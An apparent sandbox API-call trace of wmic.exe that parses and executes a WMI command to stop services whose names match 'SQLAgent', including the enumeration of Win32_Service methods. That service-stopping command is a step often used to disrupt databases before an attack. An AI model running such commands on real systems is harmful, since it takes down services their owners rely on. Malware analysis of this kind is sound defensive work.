[0243.176] lstrlenW (lpString=" path Win32_Service where \"name like '%%SQLAgent%%'\" call stopservice") returned 70 [0243.176] lstrlenW (lpString=" path Win32_Service where \"name like '%%SQLAgent%%'\" call stopservice") returned 70 [0243.176] malloc (_Size=0x8e) returned 0x47ce60 [0243.176] lstrlenW (lpString=" path Win32_Service where \"name like '%%SQLAgent%%'\" call stopservice") returned 70 [0243.176] lstrlenW (lpString=" path Win32_Service where \"name like '%%SQLAgent%%'\" call stopservice") returned 70 [0243.176] lstrlenW (lpString=" path Win32_Service where \"name like '%%SQLAgent%%'\" call stopservice") returned 70 [0243.176] malloc (_Size=0xa) returned 0x47cb20 [0243.176] lstrlenW (lpString="path") returned 4 [0243.177] _wcsicmp (_String1="path", _String2="\"NULL\"") returned 78 [0243.177] malloc (_Size=0xa) returned 0x47cb40 [0243.177] malloc (_Size=0x8) returned 0x477140 [0243.177] free (_Block=0x0) [0243.177] free (_Block=0x47cb20) [0243.177] lstrlenW (lpString=" path Win32_Service where \"name like '%%SQLAgent%%'\" call stopservice") returned 70 [0243.177] malloc (_Size=0x1c) returned 0x47cf00 [0243.177] lstrlenW (lpString="Win32_Service") returned 13 [0243.177] _wcsicmp (_String1="Win32_Service", _String2="\"NULL\"") returned 85 [0243.177] malloc (_Size=0x1c) returned 0x47cf30 [0243.177] malloc (_Size=0x10) returned 0x47cb20 [0243.177] memmove_s (in: _Destination=0x47cb20, _DestinationSize=0x8, _Source=0x477140, _SourceSize=0x8 | out: _Destination=0x47cb20) returned 0x0 [0243.177] free (_Block=0x477140) [0243.177] free (_Block=0x0) [0243.177] free (_Block=0x47cf00) [0243.177] lstrlenW (lpString=" path Win32_Service where \"name like '%%SQLAgent%%'\" call stopservice") returned 70 [0243.177] malloc (_Size=0xc) returned 0x47cb60 [0243.177] lstrlenW (lpString="where") returned 5 [0243.177] _wcsicmp (_String1="where", _String2="\"NULL\"") returned 85 [0243.177] malloc (_Size=0xc) returned 0x47cb80 [0243.177] malloc (_Size=0x18) returned 0x47cba0 [0243.177] memmove_s (in: _Destination=0x47cba0, _DestinationSize=0x10, _Source=0x47cb20, _SourceSize=0x10 | out: _Destination=0x47cba0) returned 0x0 [0243.177] free (_Block=0x47cb20) [0243.177] free (_Block=0x0) [0243.177] free (_Block=0x47cb60) [0243.177] lstrlenW (lpString=" path Win32_Service where \"name like '%%SQLAgent%%'\" call stopservice") returned 70 [0243.177] malloc (_Size=0x36) returned 0x4785c0 [0243.177] lstrlenW (lpString="\"name like '%%SQLAgent%%'\"") returned 26 [0243.178] _wcsicmp (_String1="\"name like '%%SQLAgent%%'\"", _String2="\"NULL\"") returned -20 [0243.178] lstrlenW (lpString="\"name like '%%SQLAgent%%'\"") returned 26 [0243.178] lstrlenW (lpString="\"name like '%%SQLAgent%%'\"") returned 26 [0243.178] malloc (_Size=0x36) returned 0x478600 [0243.178] malloc (_Size=0x20) returned 0x47cf00 [0243.178] memmove_s (in: _Destination=0x47cf00, _DestinationSize=0x18, _Source=0x47cba0, _SourceSize=0x18 | out: _Destination=0x47cf00) returned 0x0 [0243.178] free (_Block=0x47cba0) [0243.178] free (_Block=0x0) [0243.178] free (_Block=0x4785c0) [0243.178] lstrlenW (lpString=" path Win32_Service where \"name like '%%SQLAgent%%'\" call stopservice") returned 70 [0243.178] malloc (_Size=0xa) returned 0x47cba0 [0243.178] lstrlenW (lpString="call") returned 4 [0243.178] _wcsicmp (_String1="call", _String2="\"NULL\"") returned 65 [0243.178] malloc (_Size=0xa) returned 0x47cb60 [0243.178] malloc (_Size=0x30) returned 0x4785c0 [0243.178] memmove_s (in: _Destination=0x4785c0, _DestinationSize=0x20, _Source=0x47cf00, _SourceSize=0x20 | out: _Destination=0x4785c0) returned 0x0 [0243.178] free (_Block=0x47cf00) [0243.178] free (_Block=0x0) [0243.178] free (_Block=0x47cba0) [0243.178] lstrlenW (lpString=" path Win32_Service where \"name like '%%SQLAgent%%'\" call stopservice") returned 70 [0243.178] malloc (_Size=0x18) returned 0x47cba0 [0243.178] lstrlenW (lpString="stopservice") returned 11 [0243.178] _wcsicmp (_String1="stopservice", _String2="\"NULL\"") returned 81 [0243.178] malloc (_Size=0x18) returned 0x47cb20 [0243.178] free (_Block=0x0) [0243.178] free (_Block=0x47cba0) [0243.178] malloc (_Size=0x30) returned 0x478640 [0243.178] lstrlenW (lpString="QUIT") returned 4 [0243.178] lstrlenW (lpString="path") returned 4 [0243.179] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="path", cchCount1=4, lpString2="QUIT", cchCount2=4) returned 1 [0243.179] lstrlenW (lpString="EXIT") returned 4 [0243.179] lstrlenW (lpString="path") returned 4 [0243.179] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="path", cchCount1=4, lpString2="EXIT", cchCount2=4) returned 3 [0243.179] free (_Block=0x478640) [0243.179] WbemLocator:IUnknown:AddRef (This=0x1bd1390) returned 0x2 [0243.179] malloc (_Size=0x30) returned 0x478640 [0243.179] lstrlenW (lpString="/") returned 1 [0243.179] lstrlenW (lpString="path") returned 4 [0243.179] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="path", cchCount1=4, lpString2="/", cchCount2=1) returned 3 [0243.179] lstrlenW (lpString="-") returned 1 [0243.179] lstrlenW (lpString="path") returned 4 [0243.179] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="path", cchCount1=4, lpString2="-", cchCount2=1) returned 3 [0243.179] lstrlenW (lpString="CLASS") returned 5 [0243.179] lstrlenW (lpString="path") returned 4 [0243.179] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="path", cchCount1=4, lpString2="CLASS", cchCount2=5) returned 3 [0243.179] lstrlenW (lpString="PATH") returned 4 [0243.179] lstrlenW (lpString="path") returned 4 [0243.179] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="path", cchCount1=4, lpString2="PATH", cchCount2=4) returned 2 [0243.179] lstrlenW (lpString="/") returned 1 [0243.179] lstrlenW (lpString="Win32_Service") returned 13 [0243.179] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="Win32_Service", cchCount1=13, lpString2="/", cchCount2=1) returned 3 [0243.179] lstrlenW (lpString="-") returned 1 [0243.179] lstrlenW (lpString="Win32_Service") returned 13 [0243.179] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="Win32_Service", cchCount1=13, lpString2="-", cchCount2=1) returned 3 [0243.180] lstrlenW (lpString="Win32_Service") returned 13 [0243.180] malloc (_Size=0x1c) returned 0x47cf00 [0243.180] lstrlenW (lpString="Win32_Service") returned 13 [0243.180] wcstok (in: _String="Win32_Service", _Delimiter=".", _Context=0xfff | out: _String="Win32_Service", _Context=0xfff) returned="Win32_Service" [0243.180] lstrlenW (lpString="Win32_Service") returned 13 [0243.180] malloc (_Size=0x1c) returned 0x477140 [0243.180] lstrlenW (lpString="Win32_Service") returned 13 [0243.180] wcstok (in: _String=0x0, _Delimiter=",", _Context=0xffffffffffc36510 | out: _String=0x0, _Context=0xffffffffffc36510) returned 0x0 [0243.180] lstrlenW (lpString="") returned 0 [0243.180] lstrlenW (lpString="WHERE") returned 5 [0243.180] lstrlenW (lpString="where") returned 5 [0243.180] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="where", cchCount1=5, lpString2="WHERE", cchCount2=5) returned 2 [0243.180] lstrlenW (lpString="/") returned 1 [0243.180] lstrlenW (lpString="name like '%%SQLAgent%%'") returned 24 [0243.180] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="name like '%%SQLAgent%%'", cchCount1=24, lpString2="/", cchCount2=1) returned 3 [0243.180] lstrlenW (lpString="-") returned 1 [0243.180] lstrlenW (lpString="name like '%%SQLAgent%%'") returned 24 [0243.180] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="name like '%%SQLAgent%%'", cchCount1=24, lpString2="-", cchCount2=1) returned 3 [0243.180] lstrlenW (lpString="name like '%%SQLAgent%%'") returned 24 [0243.180] malloc (_Size=0x32) returned 0x478680 [0243.180] lstrlenW (lpString="name like '%%SQLAgent%%'") returned 24 [0243.180] lstrlenW (lpString="/") returned 1 [0243.180] lstrlenW (lpString="call") returned 4 [0243.180] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="/", cchCount2=1) returned 3 [0243.180] lstrlenW (lpString="-") returned 1 [0243.180] lstrlenW (lpString="call") returned 4 [0243.181] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="-", cchCount2=1) returned 3 [0243.181] lstrlenW (lpString="call") returned 4 [0243.181] malloc (_Size=0xa) returned 0x47cba0 [0243.181] lstrlenW (lpString="call") returned 4 [0243.181] lstrlenW (lpString="GET") returned 3 [0243.181] lstrlenW (lpString="call") returned 4 [0243.181] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="GET", cchCount2=3) returned 1 [0243.181] lstrlenW (lpString="LIST") returned 4 [0243.181] lstrlenW (lpString="call") returned 4 [0243.181] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="LIST", cchCount2=4) returned 1 [0243.181] lstrlenW (lpString="SET") returned 3 [0243.181] lstrlenW (lpString="call") returned 4 [0243.181] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="SET", cchCount2=3) returned 1 [0243.181] lstrlenW (lpString="CREATE") returned 6 [0243.181] lstrlenW (lpString="call") returned 4 [0243.181] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="CREATE", cchCount2=6) returned 1 [0243.181] lstrlenW (lpString="CALL") returned 4 [0243.181] lstrlenW (lpString="call") returned 4 [0243.181] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="CALL", cchCount2=4) returned 2 [0243.181] lstrlenW (lpString="/") returned 1 [0243.181] lstrlenW (lpString="stopservice") returned 11 [0243.181] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="/", cchCount2=1) returned 3 [0243.181] lstrlenW (lpString="-") returned 1 [0243.181] lstrlenW (lpString="stopservice") returned 11 [0243.181] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="-", cchCount2=1) returned 3 [0243.181] lstrlenW (lpString="stopservice") returned 11 [0243.182] malloc (_Size=0x18) returned 0x47cbc0 [0243.182] lstrlenW (lpString="stopservice") returned 11 [0243.182] ??0CHString@@QEAA@XZ () returned 0xad398 [0243.182] GetCurrentThreadId () returned 0xb70 [0243.182] GetCurrentThreadId () returned 0xb70 [0243.182] ??0CHString@@QEAA@XZ () returned 0xad168 [0243.182] malloc (_Size=0x8) returned 0x47cf60 [0243.182] malloc (_Size=0x18) returned 0x47cbe0 [0243.182] malloc (_Size=0x18) returned 0x47cc00 [0243.182] WbemLocator:IWbemLocator:ConnectServer (in: This=0x1bd1390, strNetworkResource="root\\cimv2", strUser=0x0, strPassword=0x0, strLocale="ms_409", lSecurityFlags=0, strAuthority=0x0, pCtx=0x0, ppNamespace=0xffe52950 | out: ppNamespace=0xffe52950*=0x1be3a98) returned 0x0 [0243.207] free (_Block=0x47cc00) [0243.207] CoSetProxyBlanket (pProxy=0x1be3a98, dwAuthnSvc=0xffffffff, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x0) returned 0x0 [0243.207] free (_Block=0x47cf60) [0243.207] ??1CHString@@QEAA@XZ () returned 0x7fef926482c [0243.207] free (_Block=0x47cbe0) [0243.207] malloc (_Size=0x18) returned 0x47cbe0 [0243.207] IWbemServices:GetObject (in: This=0x1be3a98, strObjectPath="Win32_Service", lFlags=131072, pCtx=0x0, ppObject=0xad378*=0x0, ppCallResult=0x0 | out: ppObject=0xad378*=0x1c0bfa0, ppCallResult=0x0) returned 0x0 [0243.232] free (_Block=0x47cbe0) [0243.232] IWbemClassObject:BeginMethodEnumeration (This=0x1c0bfa0, lEnumFlags=0) returned 0x0 [0243.232] IWbemClassObject:NextMethod (in: This=0x1c0bfa0, lFlags=0, pstrName=0xad358*=0x0, ppInSignature=0xad360*=0x0, ppOutSignature=0xad368*=0x0 | out: pstrName=0xad358*="StartService", ppInSignature=0xad360*=0x0, ppOutSignature=0xad368*=0x1c0c4a0) returned 0x0 [0243.232] lstrlenW (lpString="StartService") returned 12 [0243.232] lstrlenW (lpString="stopservice") returned 11 [0243.232] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="StartService", cchCount2=12) returned 3 [0243.232] IUnknown:Release (This=0x1c0c4a0) returned 0x0 [0243.232] IWbemClassObject:NextMethod (in: This=0x1c0bfa0, lFlags=0, pstrName=0xad358*=0x0, ppInSignature=0xad360*=0x0, ppOutSignature=0xad368*=0x0 | out: pstrName=0xad358*="StopService", ppInSignature=0xad360*=0x0, ppOutSignature=0xad368*=0x1c0c4a0) returned 0x0 [0243.232] lstrlenW (lpString="StopService") returned 11 [0243.232] lstrlenW (lpString="stopservice") returned 11 [0243.232] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="StopService", cchCount2=11) returned 2 [0243.232] malloc (_Size=0x70) returned 0x47cf60 [0243.232] ??0CHString@@QEAA@XZ () returned 0xacd28 [0243.233] GetCurrentThreadId () returned 0xb70 [0243.233] IWbemClassObject:GetNames (in: This=0x1c0c4a0, wszQualifierName=0x0, lFlags=64, pQualifierVal=0x0, pNames=0xacd20 | out: pNames=0xacd20*="\x01ƀ\x08") returned 0x0 [0243.233] SafeArrayGetLBound (in: psa=0x2a4af0, nDim=0x1, plLbound=0xacd38 | out: plLbound=0xacd38) returned 0x0 [0243.233] SafeArrayGetUBound (in: psa=0x2a4af0, nDim=0x1, plUbound=0xacd34 | out: plUbound=0xacd34) returned 0x0 [0243.233] SafeArrayGetElement (in: psa=0x2a4af0, rgIndices=0xacd14, pv=0xacd18 | out: pv=0xacd18) returned 0x0 [0243.233] malloc (_Size=0x48) returned 0x47cfe0 [0243.233] IWbemClassObject:GetPropertyQualifierSet (in: This=0x1c0c4a0, wszProperty="ReturnValue", ppQualSet=0xacb68 | out: ppQualSet=0xacb68*=0x1bd13b0) returned 0x0 [0243.233] malloc (_Size=0x18) returned 0x47cbe0 [0243.233] IWbemQualifierSet:Get (in: This=0x1bd13b0, wszName="CIMTYPE", lFlags=0, pVal=0xacbf0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x1), plFlavor=0x0 | out: pVal=0xacbf0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="uint32", varVal2=0x1), plFlavor=0x0) returned 0x0 [0243.234] free (_Block=0x47cbe0) [0243.234] malloc (_Size=0x18) returned 0x47cbe0 [0243.234] IWbemClassObject:Get (in: This=0x1c0c4a0, wszName="ReturnValue", lFlags=0, pVal=0xacc98*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xfffffffffffffffe, varVal2=0x0), pType=0xacb78*=707520, plFlavor=0x0 | out: pVal=0xacc98*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xfffffffffffffffe, varVal2=0x0), pType=0xacb78*=19, plFlavor=0x0) returned 0x0 [0243.234] malloc (_Size=0x18) returned 0x47cc00 [0243.234] IWbemQualifierSet:Get (in: This=0x1bd13b0, wszName="read", lFlags=0, pVal=0xacb80*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0xffe52ac0), plFlavor=0x0 | out: pVal=0xacb80*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0xffe52ac0), plFlavor=0x0) returned 0x80041002 [0243.234] free (_Block=0x47cc00) [0243.234] malloc (_Size=0x18) returned 0x47cc00 [0243.234] IWbemQualifierSet:Get (in: This=0x1bd13b0, wszName="write", lFlags=0, pVal=0xacb80*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0xffe52ac0), plFlavor=0x0 | out: pVal=0xacb80*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0xffe52ac0), plFlavor=0x0) returned 0x80041002 [0243.234] free (_Block=0x47cc00) [0243.234] malloc (_Size=0x18) returned 0x47cc00 [0243.234] malloc (_Size=0x18) returned 0x47cc20 [0243.234] IWbemQualifierSet:Get (in: This=0x1bd13b0, wszName="Description", lFlags=0, pVal=0xacc30*(varType=0x0, wReserved1=0xa, wReserved2=0x0, wReserved3=0x0, varVal1=0xffdf4293, varVal2=0xacc38), plFlavor=0x0 | out: pVal=0xacc30*(varType=0x0, wReserved1=0xa, wReserved2=0x0, wReserved3=0x0, varVal1=0xffdf4293, varVal2=0xacc38), plFlavor=0x0) returned 0x80041002 [0243.235] free (_Block=0x47cc20) [0243.235] malloc (_Size=0x18) returned 0x47cc20 [0243.235] lstrlenA (lpString="Not Available") returned 13 [0243.235] malloc (_Size=0x1c) returned 0x47d030 [0243.235] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xffde22f0, cbMultiByte=-1, lpWideCharStr=0x47d030, cchWideChar=14 | out: lpWideCharStr="Not Available") returned 14 [0243.235] free (_Block=0x47d030) [0243.235] IUnknown:Release (This=0x1bd13b0) returned 0x0 [0243.235] malloc (_Size=0x48) returned 0x47d030 [0243.235] malloc (_Size=0x18) returned 0x47cc40 [0243.235] malloc (_Size=0x48) returned 0x47d080 [0243.235] malloc (_Size=0x70) returned 0x47d0d0 [0243.235] malloc (_Size=0x48) returned 0x47d150 [0243.235] free (_Block=0x47d080) [0243.235] free (_Block=0x47d030) [0243.235] free (_Block=0x47cfe0) [0243.235] free (_Block=0x47cc00) [0243.235] free (_Block=0x47cc20) [0243.235] ??1CHString@@QEAA@XZ () returned 0x7fef926482c [0243.236] IWbemClassObject:GetMethodQualifierSet (in: This=0x1c0bfa0, wszMethod="StopService", ppQualSet=0xad298 | out: ppQualSet=0xad298*=0x1bd13b0) returned 0x0 [0243.236] malloc (_Size=0x18) returned 0x47cc20 [0243.236] IWbemQualifierSet:Get (in: This=0x1bd13b0, wszName="Implemented", lFlags=0, pVal=0xad2a8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1d41d398e92e, varVal2=0xffdf44fb), plFlavor=0x0 | out: pVal=0xad2a8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1d41d398e92e, varVal2=0xffdf44fb), plFlavor=0x0) returned 0x80041002 [0243.236] free (_Block=0x47cc20) [0243.236] malloc (_Size=0x18) returned 0x47cc20 [0243.236] malloc (_Size=0x18) returned 0x47cc00 [0243.236] IWbemQualifierSet:Get (in: This=0x1bd13b0, wszName="Description", lFlags=0, pVal=0xad2c0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xffe52948, varVal2=0xb70), plFlavor=0x0 | out: pVal=0xad2c0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="The StopService method places the service in the stopped state. It returns an integer value of 0 if the service was successfully stopped, 1 if the request is not supported, and any other number to indicate an error. It returns one of the following integer values:\n0 - The request was accepted.\n1 - The request is not supported.\n2 - The user did not have the necessary access.\n3 - The service cannot be stopped because other services that are running are dependent on it.\n4 - The requested control code is not valid, or it is unacceptable to the service.\n5 - The requested control code cannot be sent to the service because the state of the service (Win32_BaseService:State) is equal to 0, 1, or 2.\n6 - The service has not been started.\n7 - The service did not respond to the start request in a timely fashion.\n8 - Unknown failure when starting the service.\n9 - The directory path to the service executable was not found.\n10 - The service is already running.\n11 - The database to add a new service is locked.\n12 - A dependency for which this service relies on has been removed from the system.\n13 - The service failed to find the service needed from a dependent service.\n14 - The service has been disabled from the system.\n15 - The service does not have the correct authentication to run on the system.\n16 - This service is being removed from the system.\n17 - There is no execution thread for the service.\n18 - There are circular dependencies when starting the service.\n19 - There is a service running under the same name.\n20 - There are invalid characters in the name of the service.\n21 - Invalid parameters have been passed to the service.\n22 - The account, which this service is to run under is either invalid or lacks the permissions to run the service.\n23 - The service exists in the database of services available from the system.\n24 - The service is currently paused in the system.\nOther - For integer values other than those listed above, refer to Win32 error code documentation.", varVal2=0xb70), plFlavor=0x0) returned 0x0 [0243.236] free (_Block=0x47cc00) [0243.236] malloc (_Size=0x18) returned 0x47cc00 [0243.236] IUnknown:Release (This=0x1bd13b0) returned 0x0 [0243.236] malloc (_Size=0x70) returned 0x47cfe0 [0243.236] malloc (_Size=0x70) returned 0x47d1a0 [0243.236] malloc (_Size=0x48) returned 0x47d060 [0243.236] malloc (_Size=0x18) returned 0x47cc60 [0243.237] malloc (_Size=0x70) returned 0x47d220 [0243.237] malloc (_Size=0x70) returned 0x47d2a0 [0243.237] malloc (_Size=0x48) returned 0x47d320 [0243.237] malloc (_Size=0x50) returned 0x47d370 [0243.237] malloc (_Size=0x70) returned 0x47d3d0 [0243.237] malloc (_Size=0x70) returned 0x47d450 [0243.237] malloc (_Size=0x48) returned 0x47d4d0 [0243.237] free (_Block=0x47d320) [0243.237] free (_Block=0x47d2a0) [0243.237] free (_Block=0x47d220) [0243.237] free (_Block=0x47d060) [0243.237] free (_Block=0x47d1a0) [0243.237] free (_Block=0x47cfe0) [0243.237] IUnknown:Release (This=0x1c0c4a0) returned 0x0 [0243.237] free (_Block=0x47d150) [0243.237] free (_Block=0x47d0d0) [0243.237] free (_Block=0x47cf60) [0243.237] IWbemClassObject:NextMethod (in: This=0x1c0bfa0, lFlags=0, pstrName=0xad358*=0x0, ppInSignature=0xad360*=0x0, ppOutSignature=0xad368*=0x0 | out: pstrName=0xad358*="PauseService", ppInSignature=0xad360*=0x0, ppOutSignature=0xad368*=0x1c0c4a0) returned 0x0 [0243.237] lstrlenW (lpString="PauseService") returned 12 [0243.237] lstrlenW (lpString="stopservice") returned 11 [0243.237] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="PauseService", cchCount2=12) returned 3 [0243.237] IUnknown:Release (This=0x1c0c4a0) returned 0x0 [0243.237] IWbemClassObject:NextMethod (in: This=0x1c0bfa0, lFlags=0, pstrName=0xad358*=0x0, ppInSignature=0xad360*=0x0, ppOutSignature=0xad368*=0x0 | out: pstrName=0xad358*="ResumeService", ppInSignature=0xad360*=0x0, ppOutSignature=0xad368*=0x1c0c4a0) returned 0x0 [0243.237] lstrlenW (lpString="ResumeService") returned 13 [0243.237] lstrlenW (lpString="stopservice") returned 11 [0243.237] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="ResumeService", cchCount2=13) returned 3 [0243.238] IUnknown:Release (This=0x1c0c4a0) returned 0x0 [0243.238] IWbemClassObject:NextMethod (in: This=0x1c0bfa0, lFlags=0, pstrName=0xad358*=0x0, ppInSignature=0xad360*=0x0, ppOutSignature=0xad368*=0x0 | out: pstrName=0xad358*="InterrogateService", ppInSignature=0xad360*=0x0, ppOutSignature=0xad368*=0x1c0c4a0) returned 0x0 [0243.238] lstrlenW (lpString="InterrogateService") returned 18 [0243.238] lstrlenW (lpString="stopservice") returned 11 [0243.238] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="InterrogateService", cchCount2=18) returned 3 [0243.238] IUnknown:Release (This=0x1c0c4a0) returned 0x0 [0243.238] IWbemClassObject:NextMethod (in: This=0x1c0bfa0, lFlags=0, pstrName=0xad358*=0x0, ppInSignature=0xad360*=0x0, ppOutSignature=0xad368*=0x0 | out: pstrName=0xad358*="UserControlService", ppInSignature=0xad360*=0x1c0c520, ppOutSignature=0xad368*=0x1c0ca20) returned 0x0 [0243.238] lstrlenW (lpString="UserControlService") returned 18 [0243.238] lstrlenW (lpString="stopservice") returned 11 [0243.238] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="UserControlService", cchCount2=18) returned 1 [0243.238] IUnknown:Release (This=0x1c0c520) returned 0x0 [0243.238] IUnknown:Release (This=0x1c0ca20) returned 0x0 [0243.238] IWbemClassObject:NextMethod (in: This=0x1c0bfa0, lFlags=0, pstrName=0xad358*=0x0, ppInSignature=0xad360*=0x0, ppOutSignature=0xad368*=0x0 | out: pstrName=0xad358*="Create", ppInSignature=0xad360*=0x1c0e470, ppOutSignature=0xad368*=0x1c0e970) returned 0x0 [0243.239] lstrlenW (lpString="Create") returned 6 [0243.239] lstrlenW (lpString="stopservice") returned 11 [0243.239] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="Create", cchCount2=6) returned 3 [0243.239] IUnknown:Release (This=0x1c0e470) returned 0x0 [0243.239] IUnknown:Release (This=0x1c0e970) returned 0x0 [0243.239] IWbemClassObject:NextMethod (in: This=0x1c0bfa0, lFlags=0, pstrName=0xad358*=0x0, ppInSignature=0xad360*=0x0, ppOutSignature=0xad368*=0x0 | out: pstrName=0xad358*="Change", ppInSignature=0xad360*=0x1c0e1f0, ppOutSignature=0xad368*=0x1c0e6f0) returned 0x0 [0243.239] lstrlenW (lpString="Change") returned 6 [0243.239] lstrlenW (lpString="stopservice") returned 11 [0243.239] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="Change", cchCount2=6) returned 3 [0243.239] IUnknown:Release (This=0x1c0e1f0) returned 0x0 [0243.239] IUnknown:Release (This=0x1c0e6f0) returned 0x0 [0243.239] IWbemClassObject:NextMethod (in: This=0x1c0bfa0, lFlags=0, pstrName=0xad358*=0x0, ppInSignature=0xad360*=0x0, ppOutSignature=0xad368*=0x0 | out: pstrName=0xad358*="ChangeStartMode", ppInSignature=0xad360*=0x1c0c610, ppOutSignature=0xad368*=0x1c0cb10) returned 0x0 [0243.239] lstrlenW (lpString="ChangeStartMode") returned 15 [0243.239] lstrlenW (lpString="stopservice") returned 11 [0243.239] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="ChangeStartMode", cchCount2=15) returned 3 [0243.239] IUnknown:Release (This=0x1c0c610) returned 0x0 [0243.239] IUnknown:Release (This=0x1c0cb10) returned 0x0 [0243.239] IWbemClassObject:NextMethod (in: This=0x1c0bfa0, lFlags=0, pstrName=0xad358*=0x0, ppInSignature=0xad360*=0x0, ppOutSignature=0xad368*=0x0 | out: pstrName=0xad358*="Delete", ppInSignature=0xad360*=0x0, ppOutSignature=0xad368*=0x1c0c4a0) returned 0x0 [0243.240] lstrlenW (lpString="Delete") returned 6 [0243.240] lstrlenW (lpString="stopservice") returned 11 [0243.240] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="Delete", cchCount2=6) returned 3 [0243.240] IUnknown:Release (This=0x1c0c4a0) returned 0x0 [0243.240] IWbemClassObject:NextMethod (in: This=0x1c0bfa0, lFlags=0, pstrName=0xad358*=0x0, ppInSignature=0xad360*=0x0, ppOutSignature=0xad368*=0x0 | out: pstrName=0xad358*="GetSecurityDescriptor", ppInSignature=0xad360*=0x0, ppOutSignature=0xad368*=0x1c0c640) returned 0x0 [0243.240] lstrlenW (lpString="GetSecurityDescriptor") returned 21 [0243.240] lstrlenW (lpString="stopservice") returned 11 [0243.240] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="GetSecurityDescriptor", cchCount2=21) returned 3 [0243.240] IUnknown:Release (This=0x1c0c640) returned 0x0 [0243.240] IWbemClassObject:NextMethod (in: This=0x1c0bfa0, lFlags=0, pstrName=0xad358*=0x0, ppInSignature=0xad360*=0x0, ppOutSignature=0xad368*=0x0 | out: pstrName=0xad358*="SetSecurityDescriptor", ppInSignature=0xad360*=0x1c0c520, ppOutSignature=0xad368*=0x1c0ca20) returned 0x0 [0243.240] lstrlenW (lpString="SetSecurityDescriptor") returned 21 [0243.240] lstrlenW (lpString="stopservice") returned 11 [0243.240] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="SetSecurityDescriptor", cchCount2=21) returned 3 [0243.240] IUnknown:Release (This=0x1c0c520) returned 0x0 [0243.240] IUnknown:Release (This=0x1c0ca20) returned 0x0 [0243.240] IWbemClassObject:NextMethod (in: This=0x1c0bfa0, lFlags=0, pstrName=0xad358*=0x0, ppInSignature=0xad360*=0x0, ppOutSignature=0xad368*=0x0 | out: pstrName=0xad358*=0x0, ppInSignature=0xad360*=0x0, ppOutSignature=0xad368*=0x0) returned 0x40005 [0243.240] IUnknown:Release (This=0x1c0bfa0) returned 0x0 [0243.240] ??1CHString@@QEAA@XZ () returned 0x7fef926482c [0243.240] lstrlenW (lpString="SET") returned 3 [0243.240] lstrlenW (lpString="call") returned 4 [0243.240] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="SET", cchCount2=3) returned 1 [0243.240] lstrlenW (lpString="CREATE") returned 6 [0243.240] lstrlenW (lpString="call") returned 4 [0243.241] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="CREATE", cchCount2=6) returned 1 [0243.241] free (_Block=0x478640) [0243.241] malloc 